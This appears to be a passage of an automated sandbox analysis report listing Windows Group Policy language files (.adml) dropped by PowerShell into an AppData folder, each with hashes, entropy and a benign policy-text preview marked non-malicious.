                                                                                          SHA1:21E31C62BA3B2E963A2A78B9490270D87E14F082
                                                                                          SHA-256:3649D182A6D570C693D564E11B80127960E3F34BD98C2DABC5E5A1F640B7EACF
                                                                                          SHA-512:2F726D9A4E067AC354A7C6E5EC36EC5973CD04731E4A14DF3DE30061447A077F38F8B4752112E0DB0BA3E1DACCB6A0C98F148F4FB00FCBEE07B6D6A7206020F0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PublishDfsRoots">Allow DFS roots to be published</string>.. <string id="PublishDfsRoots_Help">This policy setting determines whether the user can publish DFS roots in Active Directory Domain Services (AD DS).....If you enable or do not configure this policy setting, users can use the "Publish in Active Directory" option to publish DFS roots as shared folders in AD DS .....If you disable this policy setting, users cannot publish DFS roots in AD DS and the "Publish in Active Directory" option is disabled. Note:

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Sharing.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (372), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2463
                                                                                          Entropy (8bit):4.766622027240466
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKMQ44nWQqxjgwrGOnLbvE4juaM8oFV:LeD5pmdpMGOnN6aM8oFV
                                                                                          MD5:F76CBCDF77EAC5FEF366F9F9D45F5E76
                                                                                          SHA1:89F54964A2B4E1DE63448AADFCC678470886DDAF
                                                                                          SHA-256:56D6E0E7FD98836C698D345735B4F7633DF49C455500C41B20E7B5D6FDF40AB3
                                                                                          SHA-512:D86BB5E1DA555D6F09FEA4E3C930AE560E777F64B0C38A225201CC401869A82A0A05A5C3E874310C1F4C0BA33F131B607CBA7DAB8BE61AC247F44CCB080401D2
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoInplaceSharing">Prevent users from sharing files within their profile.</string>.. <string id="NoInplaceSharing_Help">This policy setting specifies whether users can share files within their profile. By default users are allowed to share files within their profile to other users on their network after an administrator opts in the computer. An administrator can opt in the computer by using the sharing wizard to share a file within their profile.....If you enable this policy setting, users cannot share files w

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Shell-CommandPrompt-RegEditTools.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (461), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5239
                                                                                          Entropy (8bit):4.777406183575808
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmrH1U680U30fNS57tc/Ja80+fgT9lsc/osa80+fVxV:EYU6xU3RtckQ0zscCQVT
                                                                                          MD5:3925D35054AB425A8F3690C2FA33BDFC
                                                                                          SHA1:A2DFC384B4F8351B40B9406A94ADEFB1B85F9C7B
                                                                                          SHA-256:BEC7CF7EC0CDFD01BB8677C20C887988A642742F136C0437D49A67F218087842
                                                                                          SHA-512:AE7CABBE1C4E7618E787F9D3BDB621CB32E99F5802114A20BCF6ADA2E7B52F7EE12556E8023B38142FF42EA580624DAB40D988B23AEE4BB4BB9E2A8905B175D1
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableCMD">Prevent access to the command prompt</string>.. <string id="DisableCMD_Help">This policy setting prevents users from running the interactive command prompt, Cmd.exe. This policy setting also determines whether batch files (.cmd and .bat) can run on the computer.....If you enable this policy setting and the user tries to open a command window, the system displays a message explaining that a setting prevents the action.....If you disable this policy setting or do not configure it, users can run Cmd.

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ShellWelcomeCenter.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1034
                                                                                          Entropy (8bit):4.934703334666594
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y8Cnid3PRM5LDa3IQWFV:cgeD5x8gm8fK4IPRMNe3IQWFV
                                                                                          MD5:E1C3A48A813C8E8D7F076966FFF1782F
                                                                                          SHA1:E678B2457A0B3D7FA37C25899823E1DCBF335552
                                                                                          SHA-256:778A48685463098ECBAB0E95EC4BA4CC299704453A10B790404D636C78495A6F
                                                                                          SHA-512:E7B2002E5ABEDBC1C2E877143F6296A060FF2BE18CDF9743119F068CBA422A4D4B502E7E69DCABA5D1A5BBB20E42D9EA978479A3A996040E4F9CC5413F1E1F5E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RestrictWelcomeCenter">Do not display the Welcome Center at user logon</string>.. <string id="RestrictWelcomeCenter_Help">This policy setting prevents the display of the Welcome Center at user logon.....If you enable this policy setting, the Welcome Center is not displayed at user logon. The user can access the Welcome Center using the Control Panel or Start menu.....If you disable or do not configure this policy setting, the Welcome Center is displayed at user logon.</string>.. </stringTable>.. </resource

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Sidebar.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2181
                                                                                          Entropy (8bit):4.808024425882859
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKv7uPPd4IaFpT6P0vQWjp3lFV:LeD5pm38BG56i1FV
                                                                                          MD5:FF097ECD6B6D14BEEB70B111DEB1EE8C
                                                                                          SHA1:2AE1D93696A7892254D05D9C73B21360B056EDAE
                                                                                          SHA-256:70198BCD06B06CBBFBE1CCDDDC0815D3BB2239CAD51403E32340C20B892A06D9
                                                                                          SHA-512:E1C41A1B9CC3CE9987CFA52447A24CCEA55CE38F4F09AAC5071365CF206D28D94F7C4CE77B3B693D019084DA2BD5F9646EEB287BA8C4CBDADB06C6614EF87F03
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Sidebar">Desktop Gadgets</string>.. <string id="TurnOffSidebar">Turn off desktop gadgets</string>.. <string id="TurnOffSidebar_Explain">This policy setting allows you to turn off desktop gadgets. Gadgets are small applets that display information or utilities on the desktop.....If you enable this setting, desktop gadgets will be turned off.....If you disable or do not configure this setting, desktop gadgets will be turned on.....The default is for desktop gadgets to be turned on.</string>.. <string

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SkyDrive.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (698), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3086
                                                                                          Entropy (8bit):4.858829936806005
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:c/x8gZmwKweH8weDCmOw7khgLf6aweXLwepnFo7hgjfAwleJ9dwBb7DQweFXKV:wpZmmymCmCeSVAo7hzzM7DXLV
                                                                                          MD5:7C6ABEF96D8FC4473B348F9CC6AB14CA
                                                                                          SHA1:4ED99551F1EF8DCD42BC5A66A9072739CBB106A8
                                                                                          SHA-256:0D9F815210F123D3A3201EA0530F0C5F4C8C2B3CF6AE146402D1B3D7E83E77C6
                                                                                          SHA-512:A360D6F086C9173869E70027EEB9BA07CE40DEA1098E0582206F7A4D3EF101DDD4DDBCB5A7CB95445CC4394FB09577D6C81DACEC6791F592DE18F80A515C75C8
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Prevent OneDrive file sync</displayName>.. <description>Prevent files from being automatically synced to OneDrive</description>.. <resources>.. <stringTable>.. general -->.. <string id="SkydriveSettingCategory">OneDrive</string>.. .. prevent file sync-->.. <string id="PreventSkydriveFileSync">Prevent the usage of OneDrive for file storage</string>.. <string id="PreventSkydriveFileSync_help">This policy setting lets you prevent apps and features from working with files on OneDrive...If you enable this policy setting:....* Users can.t access OneDrive from the OneDrive app and file picker...* Windows Store apps can.t access OneDrive using the WinRT API...* OneDrive

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Smartcard.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (505), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):13897
                                                                                          Entropy (8bit):4.622403059025047
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ErlLxCEj//4LPwqCop5PqByD2mqKzeYWApNHXsV3sCkm0gb9DiCPoQCDEi1969sp:OHal3as861969sMot
                                                                                          MD5:8EE4A00ED150375834D94CDF3644BB08
                                                                                          SHA1:2818877ACB6381F12CB1583B8C366B8E2E8FB8CF
                                                                                          SHA-256:CF6F61B50CD4BF427834FEC9D7D5C6FBDC0CDB3C5E8E07A66F04BA3D60E093B9
                                                                                          SHA-512:4E4B668272BF4F64C4C47E09A2F38422D49391C418A62CB1E955A683B7045E0646FDC33E5565902F20281D28406074FFC07FC9A5AB9A4154B6F2D496C3DD1087
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowCertificatesWithNoEKU">Allow certificates with no extended key usage certificate attribute</string>.. <string id="AllowCertificatesWithNoEKU_help">This policy setting lets you allow certificates without an Extended Key Usage (EKU) set to be used for logon.....In versions of Windows prior to Windows Vista, smart card certificates that are used for logon require an enhanced key usage (EKU) extension with a smart card logon object identifier. This policy setting can be used to modify that restriction.....If

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Snis.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2612
                                                                                          Entropy (8bit):4.846146849523547
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKmZRbhuTOk1/hK82bGGrTFwbXOxJhK8hTwJkxwXzNCSFV:LeD5pmCZlhuykphr2bGGrTFwb+7hrhT8
                                                                                          MD5:80C54C63C7D081F9C7D7738D50F1D92A
                                                                                          SHA1:11ECD72C962D4B9F90E158A8D0D9544A3101D6A0
                                                                                          SHA-256:D764EA69BA0C9BF3B83D8D497820419A8EC755B4A81C4394DB5A73C6FF19CDFB
                                                                                          SHA-512:D82E63819C06EBAE7A2E0BD8B9CD879D766EA18A4B2B2CAB3E38A2ECF8D585E40C0F2EF89FD59781B3D6A6152AC65C40A2FEC966BB37151F8DA3CFEA8AD4ED22
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Snis">Server for NIS</string>.. <string id="Snis_LoggingLevel">Turn on extensive logging for Active Directory Domain Services domain controllers that are running Server for NIS</string>.. <string id="Snis_LoggingLevel_Help">This policy setting allows an administrator to configure extensive logging for computers that are running Server for Network Information Service (NIS).....If you enable this policy setting, intermediate steps of NIS map updates or propagations, and whether map updates are successful, a

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Snmp.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5042
                                                                                          Entropy (8bit):4.799259798850357
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm4bGHevi6cwIJyoKbT6c0Jyovt46cwnJyoPlV:EJHi65MKf6JF4655PH
                                                                                          MD5:C5F44A83C74633615BB7005A8530B912
                                                                                          SHA1:63AFE83576A32B083EFA4003A95CD82A66461FDC
                                                                                          SHA-256:205A6CCFF312FB39D59B754925B871CA51845DEB5224EC0BF41B48BE64589C7D
                                                                                          SHA-512:A11028E185B061A2F42849F09CBB50AA75D0B6FB25650A65C1099CC33E5CEFD024B870F0E3E5C39C1B632DCDC9B4AB7526D5A29DD5DF1E33BABB45AA31D6F4AC
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SNMP_Communities">Specify communities</string>.. <string id="SNMP_PermittedManagers">Specify permitted managers</string>.. <string id="SNMP_PermittedManagers_Help">This policy setting determines the permitted list of hosts that can submit a query to the Simple Network Management (SNMP) agent running on the client computer.....Simple Network Management Protocol is a protocol designed to give a user the capability to remotely manage a computer network by polling and setting terminal values and monitoring ne

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SoundRec.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1152
                                                                                          Entropy (8bit):4.968946981075251
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yef8kxNxVhSexuCvLeKF47q8wFV:cgeD5x8gm8fKR8kNxVPcCzeo4XwFV
                                                                                          MD5:9C112ED54F6D15614FBA9B6AA1CDFBB0
                                                                                          SHA1:1F3FFFEA352DC383AA91DFC61290B95218910B59
                                                                                          SHA-256:F44E48D84C8A5914AAEBC31206F09194DC1041F3DEA70AD7ECD0E402EE3DF165
                                                                                          SHA-512:E60C57BC46963AC5A09F9C7EA82A23A5E06155D4FF0417EE5A0672B7CB053F62D8765FF807FCE58F2EBF15AB835C942B45089DE2A12B5ED3B5CA7C63D62A8941
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Soundrec_DiableApplication_TitleText">Do not allow Sound Recorder to run</string>.. <string id="Soundrec_DisableApplication_DescriptionText">Specifies whether Sound Recorder can run.....Sound Recorder is a feature of Microsoft Windows Vista that can be used to record sound from an audio input device where the recorded sound is encoded and saved as an audio file.....If you enable this policy setting, Sound Recorder will not run.....If you disable or do not configure this policy setting, Sound Recorder can be ru

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\StartMenu.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (491), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):54118
                                                                                          Entropy (8bit):4.666836415862256
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:kpbzNqeMWd095QOJzSqREFzK1HF/KPCyFqcJjkOme8j:kp/xMWd095QKz9oPCyUh
                                                                                          MD5:41F89434F7FD242C4772AFB8152909BD
                                                                                          SHA1:BCC3FC1A4CAE549D934AC9C18C61E4C956E275B7
                                                                                          SHA-256:030E413AF912FFCBFDB98B2E96A898B6826F7653C1ED021F4CEEDCC7B8C2127E
                                                                                          SHA-512:27C9BFBF15C3B7BF41A4030094F7B588ED531C2EFB4517E5F9F51A82F55E87BB6C58A9C020C9CF35BFFFD953EE91B39115A4D766C29873ADBE95B448E551EF6E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ClearRecentProgForNewUserInStartMenu">Clear the recent programs list for new users</string>.. <string id="ClearRecentProgForNewUserInStartMenu_Help">If you enable this policy setting, the recent programs list in the start menu will be blank for each new user.....If you disable or do not configure this policy, the start menu recent programs list will be pre-populated with programs for each new user.</string>.. <string id="NoGamesFolderOnStartMenu">Remove Games link from Start Menu</string>.. <string i

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SystemRestore.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2647
                                                                                          Entropy (8bit):4.731629807407312
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKJzpQytkh9hyLbSTW3bvkKh+HAskRcHGhwHSbzURJ1amFV:LeD5pm1J+cbeKhjREVbFFV
                                                                                          MD5:F0306B958EC9DAF0C4E5D2BA8355A02E
                                                                                          SHA1:970411B4074BB88CDC75E6CA63D83B51FD6220E3
                                                                                          SHA-256:79B2C3CA033B5CCECB7D24032FFBF7A718EC34BAF4C8BA66E862917337B9FBB5
                                                                                          SHA-512:32777DE33CE98BE7333D9045D8E1033E629160AD7CC205B6CCA1523F2E6886CBEE20F3682D59D315B949B35481711E8B8A6EA7399BD0137A83496D800BC6882E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SR">System Restore</string>.. <string id="SR_DisableConfig">Turn off Configuration</string>.. <string id="SR_DisableConfig_Help">Allows you to disable System Restore configuration through System Protection.....This policy setting allows you to turn off System Restore configuration through System Protection.....System Restore enables users, in the event of a problem, to restore their computers to a previous state without losing personal data files. The behavior of this policy setting depends on the "Turn o

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TPM.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (751), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):19376
                                                                                          Entropy (8bit):4.677466344688263
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:qPHRyQKHBVDkb+wRZtGixXgixyeMJgKzX1SR7YK9q/:qPHgQyPIbBRZtGYXgYYGKUg
                                                                                          MD5:62D34160550F61471F77F778AA1280CA
                                                                                          SHA1:2D681645F48460DBA0875917CBF1D2EA0970A161
                                                                                          SHA-256:62154D9046066523B2833A380FB4A6841AB369D4E7502D1EF8AD93462E0CCE12
                                                                                          SHA-512:0ACBF5E61FFB9E1F18496F6713F865E392E92CE613CFC143DAF254F63101CB1B0C0FAF16931B111BF1E47E7206B4676079371BCCD6A25543EA6A18AD676B9590
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of Trusted Platform Module (TPM) owner information. ....TPM owner information includes a cryptographic hash of the TPM owner password. Certain TPM commands can only be run by the TPM owner. This hash authorizes the TPM to run these commands. ....If you enable this policy setting, TPM owner information will be automatically and silently backed up to AD DS when you use Windows to set or change a TP

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TabletPCInputPanel.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (416), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):14958
                                                                                          Entropy (8bit):4.684169671948835
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ErZjCAOTCAClCIkwgLtL99S6hOmL0wD4mHAwq8Qh5Kxk4kxgxWx+FNPUX0E:XAZALIYLtL9ILa8blKxk4kxgxWxFkE
                                                                                          MD5:0F06155D65FCA728F2D46F0A96F4801B
                                                                                          SHA1:E8D67D09DF0AED3FC5AED0832D901F31830D8A8C
                                                                                          SHA-256:C170A92E97B43769613F0217D452B39D28A856AD93E95C0CD2E9A40FCC04E6A0
                                                                                          SHA-512:62DAF44885B775BB39F4E38F5188F0FD2096C78A0F5328451F239D78E4F9325224A8A0AAF769DDA8127CCD879F32F6A012B896E01AABAD8133D738B77B54528D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoComplete">Turn off AutoComplete integration with Input Panel</string>.. <string id="AutoCompleteExplain">Turns off the integration of application auto complete lists with Tablet PC Input Panel in applications where this behavior is available.....Tablet PC Input Panel is a Tablet PC accessory that enables you to use handwriting or an on-screen keyboard to enter text, symbols, numbers, or keyboard shortcuts.....If you enable this policy, application auto complete lists will never appear next to Input Panel.

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TabletShell.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (546), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6673
                                                                                          Entropy (8bit):4.787936688249674
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmXFnAAWTYvS60sTs2ssufgMA7I16D4K9OuNtFV:E6SCKi78DK9XNtn
                                                                                          MD5:166E80C965CED6606C2DA93D9A03B421
                                                                                          SHA1:A7651889CBFEF22000E75B348428689C0E755BF7
                                                                                          SHA-256:88F472A0DA1243EA84662AE4D730D6B86EE53E1901D7CC73EEA724218BD9EBE4
                                                                                          SHA-512:0CB95E31997AF6E77C155081FCA24FBDE9B401944251ED0D3C04F4A35F017BC3BBB4CFAEEEA8175D56C64CA9352F84DFC45827D76C0DB95CBE314F562C3C4CE0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Accessories">Accessories</string>.. <string id="Cursors">Cursors</string>.. <string id="DisableInkball">Do not allow Inkball to run</string>.. <string id="DisableInkball_Help">Prevents start of InkBall game.....If you enable this policy, the InkBall game will not run.....If you disable this policy, the InkBall game will run.....If you do not configure this policy, the InkBall game will run.</string>.. <string id="DisableJournal">Do not allow Windows Journal to be run</string>.. <string id="

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TaskScheduler.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (579), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7038
                                                                                          Entropy (8bit):4.643182607339355
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Ey3uDxqKgSDQ0DiMDoK5DuJW+ibACSYZCn:rWYaQ0Pnu4PjSZ
                                                                                          MD5:09BB6BBD535E6B16043D7DE703670523
                                                                                          SHA1:3E7743A2557844CCCC6E5AE42827E676577FE9F4
                                                                                          SHA-256:00250A97BC62D5C01E534907317937337008B28110DD7AB88A5D32AA347A3B9E
                                                                                          SHA-512:118B1B0C181AD2DD89955BFDB828E10381F481B81321295AF016A2536B86A26F302F20DFC542974CD512C48F9F2B080CE482D08031BB9B2033328267BF093DD9
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBrowse">Prohibit Browse</string>.. <string id="AllowBrowseHelp">Limits newly scheduled to items on the user's Start menu, and prevents the user from changing the scheduled program for existing tasks.....This setting removes the Browse button from the Schedule Task Wizard and from the Task tab of the properties dialog box for a task. Also, users cannot edit the "Run" box or the "Start in" box that determine the program and path for a task.....As a result, when users create a task, they must select a progra

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Taskbar.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (325), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):11395
                                                                                          Entropy (8bit):4.633029483097701
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EytLqsKeNTdPL5M8R1QfkSK1GOROjzazDzLh5/Cbl4Zgx9IQCmJwgjRLEJn:zM8R1QiGwCCDhtS41
